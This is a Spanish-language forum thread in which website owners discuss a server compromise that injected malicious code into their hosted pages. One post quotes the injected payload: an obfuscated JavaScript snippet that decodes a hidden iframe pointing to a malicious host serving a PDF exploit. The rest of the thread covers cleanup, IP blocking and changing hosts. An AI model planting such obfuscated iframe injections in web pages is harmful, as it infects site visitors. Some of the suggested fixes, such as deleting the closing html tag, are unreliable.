ATENCIÓN: Virus anda suelto, cuidado!

Algunos ya sabrán pero otros no. Un virus anda suelto en internet y es un tanto extraño al menos para mi.

En varias paginas, al entrar, ejecuta esta url (no den click) http://hu1-hu1.cn/counter/getfile.php?f=vispdf que ejecuta un pdf y trata de abrirlo.

Para más información, les dejo este topic (inglés) que encontre: http://forum.kaspersky.com/index.php...d=787304&st=0&

A mi ya me esta afectando varias paginas mias, pero al abrir los archivos en busca del codigo html malicioso, no hay nada, tengo nod32 3.0 y navego en mozilla 3.0 (segun dicen lo mas seguro para navegar por ahora).

¿Alguien sabrá como erradicar este virus de los sitios web?

MÁS INFORMACION:

Estaba checando algunos archivos de mi pagina y al final de todo se agrega esto:

<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

Ademas cambia los permisos de los archivos, por lo que no puedes sobreescribirlo sino tienes que eliminarlo y volver a subir el archivo editado sin el codigo malicioso.

Ese código que tienes al final es esto:
Aunque, ¿seguro que es un virus? ¿hay alguna página oficial de algún antivirus reconocido que lo atestigue?. Es que, habría que confirmar .

Pues no estoy seguro que sea un virus, segun el foro de kaspersky.com dicen que si.

Mi duda es, como se metio a las paginas? y como evitar que pase?

No es ningún virus amigos mios
"ES UN HACKER"
Si yo dejo de navegar un rato largo, con FireFox, aparece en la parte superior una ventana dónde me solicita Login y Passoword.... Se pasa de listo este amigo, pues al menos yo no caigo en el ataque a mi máquina.... Pero considero que algunas personas "INOCENTES" deben poner sus logins y pass en la creencia de que los solicita en éste caso el navegador para poder navegar......
Otro detalle que está sucediendo es que: Aparece una ventana de aceptacion de "MSN" y si dices que sí o aceptas corres el peligro que tengas en tus archivos algún astuto intruso, urgando entre tus cosas personales
"YO LLEVO POR NORMA, NO ACEPTO ABSOLUTAMENTE NADA QUE NO LO SOLICITE YO PERSONALMENTE"

Y de que forma se mete este codigo a las paginas y como podemos evitarlo?

Y si no es virus, entonces que es?

posiblemente se te metió al instalar algún plugin o algo x el estilo.

No, ya descubri que fue, hackearon todos los servidores de Layered Tech, donde estoy alojado.

Hola. Mi web también se ha visto afectada por este ataque. Acabo de leer las características que habeis puesto, y es lo mismo que ocurre en mi web.

Me he visto obligado a cerrar la web hasta que el problema quede erradicado.

A ver si entre todos podemos arreglarlo. Mi web tiene una parte hecha en Joomla y otra es un foro phpbb2, y las dos cosas se han visto afectadas. Nunca había visto algo así.

Saludos.

Yo también tengo el mismo problema en uno de mis servidores, y buscando en la Web me encontré con esto:

http://pastebin.com/f5f7b369e

Al parecer es el código de fuente que origina todo este caos...

Entiendo muy poco sobre hackeos, pero en una parte del código dice:

Entonces una solución "parche" mientras tanto sería añadirle a todos nuestros archivos el código 'jgsbnf!tsd', ¿no?

Peor es nada...

EDITO: Mi solución parche no funciona =_=

A mi tambien me esta pasando en los servidores de Virtualhostingdigital.com

Le he mandado un correo electronico urgente para ver que puede ser, y no se han dignado ni a contestarme.

En Fin.....

Esto es problema de Layered, mi solucion: hoy me cambio a otro server.

Por lo que estoy viendo. El Virus lo que hace es inyectar un codigo cuando encuentra en un fichero la etiqueta de cierre </html>

Si no esta esa etiqueta, pues el virus no inyecta el codigo. (al menos eso parece.....) Asi que simplemente al quitar esta etiqueta, creo que se soluciona. Eso si.... a ver si los responsables de los Servidores donde alojamos las paginas, solucionan el tema porque para eso estamos pagando una cuota.

Un Saludo a todos.

El problema es que, aunque lo quitemos, el codigo vuelve a aparecer unas horas despues.

Mi web también está alojada en los servidores de Virtual Hosting Digital. Me temo que todos sus clientes, o almenos en gran parte, debemos estar con el mismo problema.

El principal problema fue que hackeron el sistema que contiene todos los passwords de todos sus clientes.

Una de las soluciones/recomendaciones que dieron es cambiar todos los passwords de cpanel, whm, sql y webmail, pero no lo han podido solucionar.

Como habia dicho, mi solucion es cambiarme de server, desde hace mucho ya queria cambiarme por varios problemas que tuve con layered.

songoku, davenus, ustedes tienen sus sitios con layered o una empresa que renta los servicios de layered?

Yo tengo el servicio contratado con VHD, pero ignoro si éstos, a su vez, tienen los servidores contratados con Layered. No lo sé.

Cual es la url? para verificar si estan con layered o no.

http://www.planetajupiter.com

Yo tampoco lo se.

Mi direccion:

http://www.utebodigital.es/

Asi es, pertenece a Layered:

IP Location United States - United States - Layered Technologies Inc

Tambien pertenece a Layered

IP Location United States - United States - Layered Technologies Inc

Les recomiendo que se cambien de server, es lo que yo ya hice.

Buffff, nunca he hecho eso. Debe ser un lío cambiar de hosting un dominio, no?

De hecho, depende.

Nosotros hacemos cambio de servidor a servidor, no de hosting a hosting, es mas rapido de server a server, al menos de la forma que nosotros lo hacemos, lo es.

Y simplemente baneando la IP de esa web (hu1-hu1.cn) ¿podemos acabar con el problema?

Acabo de aplicarlo. Según whois, la IP de ese sitio es 91.203.93.51. He baneado de mi sitio esa IP y de momento mi web está "tranquila", pero dejemos pasar más tiempo, a ver, porque ahora estoy en el trabajo y desde aquí no puedo ver si sigue cargando esa dirección. Luego os cuento.

Aun asi, es un problema de seguridad muy grave por parte de Layered.

buenas
yo tb tengo el mismo problema en todas mis webs de virtualhostingdigital con lo del pdf
solo k ahora ha pasado a un error de codigo :S

aki teneis un ejemplo: http://www.ptcspain.com

Si estan usando algun modulo prefabricado (wordpress, joomla, etc.) eso pasa porque el codigo se mezclo en el archivo functions, ocasionando ese error, pero el codigo esta ahi.

Te lo digo porque yo tengo wordpress y tuve el mismo problema, el codigo se anexo a una funciona php ocasionando ese error.

Hola.

Bueno, yo de momento vuelvo a tener la web "limpia". Me habían quitado el troyano pero algo se había quedado en el panel de administración, cosa que han arreglado reinstalando el panel. Ahora todo vuelve a funcionar normalmente, aunque he decidido seguir teniendo la web cerrada para actualizar el Joomla y el foro phpbb, y de paso para asegurarme de que no vuelve a pasar nada más.

Por otra parte, también he baneado la IP que os decía antes. Espero haber acabado ya con el problema...

Saludos.